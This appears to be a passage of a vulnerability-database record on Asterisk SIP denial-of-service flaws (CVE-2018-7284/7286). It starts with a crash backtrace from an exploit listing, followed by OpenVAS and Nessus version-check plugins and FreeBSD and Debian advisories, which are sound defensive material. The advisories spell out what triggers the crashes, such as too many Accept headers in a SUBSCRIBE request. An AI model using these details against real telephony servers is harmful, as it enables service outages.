[email\u00a0protected]=0x7ffff78660f0 <send_response_resolver_cb>) at ../src/pjsip/sip_resolve.c:209\r\n#12 0x00007ffff78652b9 in pjsip_endpt_resolve ([email\u00a0protected]=0x1638d28, pool=<optimized out>, [email\u00a0protected]=0x7fff99116530, [email\u00a0protected]=0x7fff9918d2f0,\r\n [email\u00a0protected]=0x7ffff78660f0 <send_response_resolver_cb>) at ../src/pjsip/sip_endpoint.c:1164\r\n#13 0x00007ffff7867fe1 in pjsip_endpt_send_response (endpt=0x1638d28, [email\u00a0protected]=0x7fff99116508, [email\u00a0protected]=0x7fff9910fda8, [email\u00a0protected]=0x7fff99116408,\r\n [email\u00a0protected]=0x7ffff787cd80 <send_msg_callback>) at ../src/pjsip/sip_util.c:1796\r\n#14 0x00007ffff787bdac in tsx_send_msg (tsx=0x7fff99116408, tdata=0x7fff9910fda8) at ../src/pjsip/sip_transaction.c:2237\r\n#15 0x00007ffff787dc67 in tsx_on_state_proceeding_uas (event=0x7ffff0309b30, tsx=0x7fff99116408) at ../src/pjsip/sip_transaction.c:2704\r\n#16 tsx_on_state_trying (tsx=0x7fff99116408, event=0x7ffff0309b30) at ../src/pjsip/sip_transaction.c:2634\r\n#17 0x00007ffff787fba7 in pjsip_tsx_send_msg ([email\u00a0protected]=0x7fff99116408, [email\u00a0protected]=0x7fff9910fda8) at ../src/pjsip/sip_transaction.c:1789\r\n#18 0x00007ffff78822a3 in pjsip_dlg_send_response (dlg=0x7fff990eccc8, tsx=0x7fff99116408, [email\u00a0protected]=0x7fff9910fda8) at ../src/pjsip/sip_dialog.c:1531\r\n#19 0x00007ffff784519a in pjsip_inv_send_msg (inv=0x7fff9910bac8, tdata=0x7fff9910fda8) at ../src/pjsip-ua/sip_inv.c:3231\r\n#20 0x00007ffff1a8c043 in ast_sip_session_send_response ([email\u00a0protected]=0x7fff9910e208, tdata=<optimized out>) at res_pjsip_session.c:1712\r\n#21 0x00007ffff1a8ec09 in new_invite (invite=<synthetic pointer>) at res_pjsip_session.c:2963\r\n#22 handle_new_invite_request (rdata=0x7fff9524ce58) at res_pjsip_session.c:3062\r\n#23 session_on_rx_request (rdata=0x7fff9524ce58) at res_pjsip_session.c:3126\r\n#24 0x00007ffff7864e97 in pjsip_endpt_process_rx_data (endpt=<optimized out>, [email\u00a0protected]=0x7fff9524ce58, [email\u00a0protected]=0x7ffff1a7ed00 <param>,\r\n [email\u00a0protected]=0x7ffff0309d44) at ../src/pjsip/sip_endpoint.c:893\r\n#25 0x00007ffff185427f in distribute (data=0x7fff9524ce58) at res_pjsip/pjsip_distributor.c:903\r\n#26 0x00000000005fc6fe in ast_taskprocessor_execute ([email\u00a0protected]=0x1cf2b08) at taskprocessor.c:963\r\n#27 0x0000000000603960 in execute_tasks (data=0x1cf2b08) at threadpool.c:1322\r\n#28 0x00000000005fc6fe in ast_taskprocessor_execute (tps=0x16343d8) at taskprocessor.c:963\r\n#29 0x0000000000603e40 in threadpool_execute (pool=0x1637b78) at threadpool.c:351\r\n#30 worker_active (worker=0x7fffa0000948) at threadpool.c:1105\r\n#31 worker_start ([email\u00a0protected]=0x7fffa0000948) at threadpool.c:1024\r\n#32 0x000000000060eddd in dummy_start (data=<optimized out>) at utils.c:1257\r\n#33 0x00007ffff5e366ba in start_thread (arg=0x7ffff030a700) at pthread_create.c:333\r\n#34 0x00007ffff541f3dd in clone () at ../sysdeps/unix/sysv/linux/x86_64/clone.S:109\r\n(gdb)\r\n```\r\n\r\n## Solutions and recommendations\r\n\r\nApply the patch issued by Asterisk at <http://www.asterisk.org/security> or upgrade to the latest release.\n\n# 0day.today [2018-03-09] #", "sourceHref": "https://0day.today/exploit/29889", "cvss": {"score": 0.0, "vector": "NONE"}}], "openvas": [{"lastseen": "2019-05-29T18:32:53", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-7286", "CVE-2018-7284"], "description": "Asterisk is prone to multiple vulnerabilities.", "modified": "2018-10-26T00:00:00", "published": "2018-02-22T00:00:00", "id": "OPENVAS:1361412562310140792", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310140792", "type": "openvas", "title": "Asterisk Multiple Vulnerabilities", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_asterisk_mult_vuln_feb18.nasl 12120 2018-10-26 11:13:20Z mmartin $\n#\n# Asterisk Multiple Vulnerabilities\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2018 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = 'cpe:/a:digium:asterisk';\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.140792\");\n script_version(\"$Revision: 12120 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 13:13:20 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2018-02-22 11:26:42 +0700 (Thu, 22 Feb 2018)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_cve_id(\"CVE-2018-7284\", \"CVE-2018-7286\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Asterisk Multiple Vulnerabilities\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_asterisk_detect.nasl\");\n script_mandatory_keys(\"Asterisk-PBX/Installed\");\n\n script_tag(name:\"summary\", value:\"Asterisk is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Asterisk is prone to multiple vulnerabilities:\n\n - Crash when given an invalid SDP media format description\n\n - Crash with an invalid SDP fmtp attribute\n\n - Crash when receiving SUBSCRIBE request (CVE-2018-7284)\n\n - Crash when large numbers of TCP connections are closed suddenly (CVE-2018-7286)\");\n\n script_tag(name:\"affected\", value:\"Asterisk Open Source 13.x, 14.x, 15.x and Certified Asterisk 13.18.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Version 13.19.2, 14.7.6, 15.2.2, 13.18-cert3 or later.\");\n\n script_xref(name:\"URL\", value:\"http://downloads.asterisk.org/pub/security/AST-2018-002.html\");\n script_xref(name:\"URL\", value:\"http://downloads.asterisk.org/pub/security/AST-2018-003.html\");\n script_xref(name:\"URL\", value:\"http://downloads.asterisk.org/pub/security/AST-2018-004.html\");\n script_xref(name:\"URL\", value:\"http://downloads.asterisk.org/pub/security/AST-2018-005.html\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"revisions-lib.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!version = get_app_version(cpe: CPE, port: port))\n exit(0);\n\nif (version =~ \"^13\\.\") {\n if (version =~ \"^13\\.18cert\") {\n if (revcomp(a: version, b: \"13.18cert3\") < 0) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"13.18-cert3\");\n security_message(port: port, data: report, proto: \"udp\");\n exit(0);\n }\n }\n else {\n if (version_is_less(version: version, test_version: \"13.19.2\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"13.19.2\");\n security_message(port: port, data: report, proto: \"udp\");\n exit(0);\n }\n }\n}\n\nif (version =~ \"^14\\.\") {\n if (version_is_less(version: version, test_version: \"14.7.6\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"14.7.6\");\n security_message(port: port, data: report, proto: \"udp\");\n exit(0);\n }\n}\n\nif (version =~ \"^15\\.\") {\n if (version_is_less(version: version, test_version: \"15.2.2\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"15.2.2\");\n security_message(port: port, data: report, proto: \"udp\");\n exit(0);\n }\n}\n\nexit(0);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-07-04T18:56:07", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-7286", "CVE-2018-12227", "CVE-2018-7284", "CVE-2018-17281"], "description": "Multiple vulnerabilities have been discovered in Asterisk, an open source\nPBX and telephony toolkit, which may result in denial of service or\ninformation disclosure.", "modified": "2019-07-04T00:00:00", "published": "2018-10-16T00:00:00", "id": "OPENVAS:1361412562310704320", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310704320", "type": "openvas", "title": "Debian Security Advisory DSA 4320-1 (asterisk - security update)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Auto-generated from advisory DSA 4320-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.704320\");\n script_version(\"2019-07-04T09:25:28+0000\");\n script_cve_id(\"CVE-2018-12227\", \"CVE-2018-17281\", \"CVE-2018-7284\", \"CVE-2018-7286\");\n script_name(\"Debian Security Advisory DSA 4320-1 (asterisk - security update)\");\n script_tag(name:\"last_modification\", value:\"2019-07-04 09:25:28 +0000 (Thu, 04 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-10-16 00:00:00 +0200 (Tue, 16 Oct 2018)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://www.debian.org/security/2018/dsa-4320.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB9\");\n script_tag(name:\"affected\", value:\"asterisk on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (stretch), these problems have been fixed in\nversion 1:13.14.1~dfsg-2+deb9u4.\n\nWe recommend that you upgrade your asterisk packages.\");\n\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/asterisk\");\n script_tag(name:\"summary\", value:\"Multiple vulnerabilities have been discovered in Asterisk, an open source\nPBX and telephony toolkit, which may result in denial of service or\ninformation disclosure.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"asterisk\", ver:\"1:13.14.1~dfsg-2+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"asterisk-config\", ver:\"1:13.14.1~dfsg-2+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"asterisk-dahdi\", ver:\"1:13.14.1~dfsg-2+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"asterisk-dev\", ver:\"1:13.14.1~dfsg-2+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"asterisk-doc\", ver:\"1:13.14.1~dfsg-2+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"asterisk-mobile\", ver:\"1:13.14.1~dfsg-2+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"asterisk-modules\", ver:\"1:13.14.1~dfsg-2+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"asterisk-mp3\", ver:\"1:13.14.1~dfsg-2+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"asterisk-mysql\", ver:\"1:13.14.1~dfsg-2+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"asterisk-ooh323\", ver:\"1:13.14.1~dfsg-2+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"asterisk-voicemail\", ver:\"1:13.14.1~dfsg-2+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"asterisk-voicemail-imapstorage\", ver:\"1:13.14.1~dfsg-2+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"asterisk-voicemail-odbcstorage\", ver:\"1:13.14.1~dfsg-2+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"asterisk-vpb\", ver:\"1:13.14.1~dfsg-2+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "freebsd": [{"lastseen": "2019-05-29T18:32:00", "bulletinFamily": "unix", "cvelist": ["CVE-2018-7286", "CVE-2018-7284"], "description": "\nThe Asterisk project reports:\n\nAST-2018-004 - When processing a SUBSCRIBE request the\n\t res_pjsip_pubsub module stores the accepted formats present\n\t in the Accept headers of the request. This code did not\n\t limit the number of headers it processed despite having\n\t a fixed limit of 32. If more than 32 Accept headers were\n\t present the code would write outside of its memory and\n\t cause a crash.\nAST-2018-005 - A crash occurs when a number of\n\t authenticated INVITE messages are sent over TCP or TLS\n\t and then the connection is suddenly closed. This issue\n\t leads to a segmentation fault.\n\n", "edition": 7, "modified": "2018-06-12T00:00:00", "published": "2018-02-21T00:00:00", "id": "933654CE-17B8-11E8-90B8-001999F8D30B", "href": "https://vuxml.freebsd.org/freebsd/933654ce-17b8-11e8-90b8-001999f8d30b.html", "title": "asterisk -- multiple vulnerabilities", "type": "freebsd", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "nessus": [{"lastseen": "2021-01-01T01:21:47", "description": "According to its SIP banner, the version of Asterisk running on the\nremote host is 13.x prior to 13.19.2, 14.x prior to 14.7.6, or 13.18\nprior to 13.18-cert3. It is therefore, affected by\na Multiple Denial of Service Vulnerabilities as described in\nAST-2018-002, AST-2018-003, AST-2018-004, & AST-2018-005 advisories.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.", "edition": 29, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2018-03-02T00:00:00", "title": "Asterisk 13.x < 13.19.2 / 14.x < 14.7.6 / 13.13 < 13.18-cert3 Multiple DoS Vulnerabilities (AST-2018-002, AST-2018-003, AST-2018-004, & AST-2018-005)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-7286", "CVE-2018-7284"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:digium:asterisk"], "id": "ASTERISK_AST_2018_002-005.NASL", "href": "https://www.tenable.com/plugins/nessus/107101", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(107101);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2019/11/08\");\n\n script_cve_id(\"CVE-2018-7284\", \"CVE-2018-7286\");\n script_bugtraq_id(103129, 103151);\n\n script_name(english:\"Asterisk 13.x < 13.19.2 / 14.x < 14.7.6 / 13.13 < 13.18-cert3 Multiple DoS Vulnerabilities (AST-2018-002, AST-2018-003, AST-2018-004, & AST-2018-005)\");\n script_summary(english:\"Checks the version in the SIP banner.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A telephony application running on the remote host is affected by\na Subscribe request crash vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its SIP banner, the version of Asterisk running on the\nremote host is 13.x prior to 13.19.2, 14.x prior to 14.7.6, or 13.18\nprior to 13.18-cert3. It is therefore, affected by\na Multiple Denial of Service Vulnerabilities as described in\nAST-2018-002, AST-2018-003, AST-2018-004, & AST-2018-005 advisories.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://downloads.asterisk.org/pub/security/AST-2018-002.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://downloads.asterisk.org/pub/security/AST-2018-003.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://downloads.asterisk.org/pub/security/AST-2018-004.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://downloads.asterisk.org/pub/security/AST-2018-005.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Asterisk version 13.19.2 / 14.7.6 / 13.18-cert3 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-7284\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/02/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/02/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:digium:asterisk\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"asterisk_detection.nasl\");\n script_require_keys(\"asterisk/sip_detected\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"asterisk/sip_detected\");\n\nasterisk_kbs = get_kb_list_or_exit(\"sip/asterisk/*/version\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nis_vuln = FALSE;\nnot_vuln_installs = make_list();\nerrors = make_list();\n\nforeach kb_name (keys(asterisk_kbs))\n{\n vulnerable = 0;\n\n matches = pregmatch(pattern:\"/(udp|tcp)/([0-9]+)/version\", string:kb_name);\n if (isnull(matches))\n {\n errors = make_list(errors, \"Unexpected error parsing port number from '\"+kb_name+\"'.\");\n continue;\n }\n\n proto = matches[1];\n port = matches[2];\n version = asterisk_kbs[kb_name];\n\n if (version == 'unknown')\n {\n errors = make_list(errors, \"Unable to obtain version of installation on \" + proto + \"/\" + port + \".\");\n continue;\n }\n\n banner = get_kb_item(\"sip/asterisk/\" + proto + \"/\" + port + \"/source\");\n if (!banner)\n {\n # We have version but banner is missing;\n # log error and use in version-check though.\n errors = make_list(errors, \"KB item 'sip/asterisk/\" + proto + \"/\" + port + \"/source' is missing.\");\n banner = 'unknown';\n }\n\n if (version =~ \"^13([^0-9])\" && \"cert\" >!< tolower(version))\n {\n fixed = \"13.19.2\";\n vulnerable = ver_compare(ver:version, fix:fixed, app:\"asterisk\");\n }\n else if (version =~ \"^14([^0-9])\" && \"cert\" >!< tolower(version))\n {\n fixed = \"14.7.6\";\n vulnerable = ver_compare(ver:version, fix:fixed, app:\"asterisk\");\n }\n else if (version =~ \"^13\\.18([^0-9])\" && \"cert\" >< tolower(version))\n {\n fixed = \"13.18-cert3\";\n vulnerable = ver_compare(ver:version, fix:fixed, app:\"asterisk\");\n }\n\n if (vulnerable < 0)\n {\n is_vuln = TRUE;\n report =\n '\\n Version source : ' + banner +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed +\n '\\n';\n security_report_v4(severity:SECURITY_WARNING, port:port, proto:proto, extra:report);\n }\n else not_vuln_installs = make_list(not_vuln_installs, version + \" on port \" + proto + \"/\" + port);\n}\n\nif (max_index(errors))\n{\n if (max_index(errors) == 1) errmsg = errors[0];\n else errmsg = 'Errors were encountered verifying installations : \\n ' + join(errors, sep:'\\n ');\n\n exit(1, errmsg);\n}\nelse\n{\n installs = max_index(not_vuln_installs);\n if (installs == 0)\n {\n if (is_vuln) exit(0);\n else audit(AUDIT_NOT_INST, \"Asterisk\");\n }\n else audit(AUDIT_INST_VER_NOT_VULN, \"Asterisk\", not_vuln_installs);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-01T02:42:56", "description": "The Asterisk project reports :\n\nAST-2018-004 - When processing a SUBSCRIBE request the\nres_pjsip_pubsub module stores the accepted formats present in the\nAccept headers of the request. This code did not limit the number of\nheaders it processed despite having a fixed limit of 32. If more than\n32 Accept headers were present the code would write outside of its\nmemory and cause a crash.\n\nAST-2018-005 - A crash occurs when a number of authenticated INVITE\nmessages are sent over TCP or TLS and then the connection is suddenly\nclosed. This issue leads to a segmentation fault.", "edition": 29, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2018-02-23T00:00:00", "title": "FreeBSD : asterisk -- multiple vulnerabilities (933654ce-17b8-11e8-90b8-001999f8d30b)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-7286", "CVE-2018-7284"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:asterisk13"], "id": "FREEBSD_PKG_933654CE17B811E890B8001999F8D30B.NASL", "href": "https://www.tenable.com/plugins/nessus/106959", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(106959);\n script_version(\"3.9\");\n script_cvs_date(\"Date: 2019/04/05 23:25:06\");\n\n script_cve_id(\"CVE-2018-7284\", \"CVE-2018-7286\");\n\n script_name(english:\"FreeBSD : asterisk -- multiple vulnerabilities (933654ce-17b8-11e8-90b8-001999f8d30b)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The Asterisk project reports :\n\nAST-2018-004 - When processing a SUBSCRIBE request the\nres_pjsip_pubsub module stores the accepted formats present in the\nAccept headers of the request. This code did not limit the number of\nheaders it processed despite having a fixed limit of 32. If more than\n32 Accept headers were present the code would write outside of its\nmemory and cause a crash.\n\nAST-2018-005 - A crash occurs when a number of authenticated INVITE\nmessages are sent over TCP or TLS and then the connection is suddenly\nclosed. This issue leads to a segmentation fault.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://downloads.asterisk.org/pub/security/AST-2018-004.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://downloads.asterisk.org/pub/security/AST-2018-005.html\"\n );\n # https://vuxml.freebsd.org/freebsd/933654ce-17b8-11e8-90b8-001999f8d30b.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a1cc5a90\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:asterisk13\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/02/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/02/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/02/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"asterisk13<13.19.2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-01T01:21:47", "description": "According to its SIP banner, the version of Asterisk running on the\nremote host is 15.x prior to 15.2.2. It is therefore, affected by\nmultiple vulnerabilities as described in AST-2018-001, \nAST-2018-002, AST-2018-003, AST-2018-004, AST-2018-005,\n& AST-2018-006 advisories.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.", "edition": 29, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2018-03-02T00:00:00", "title": "Asterisk 15.x < 15.2.2 Multiple Vulnerabilities (AST-2018-001 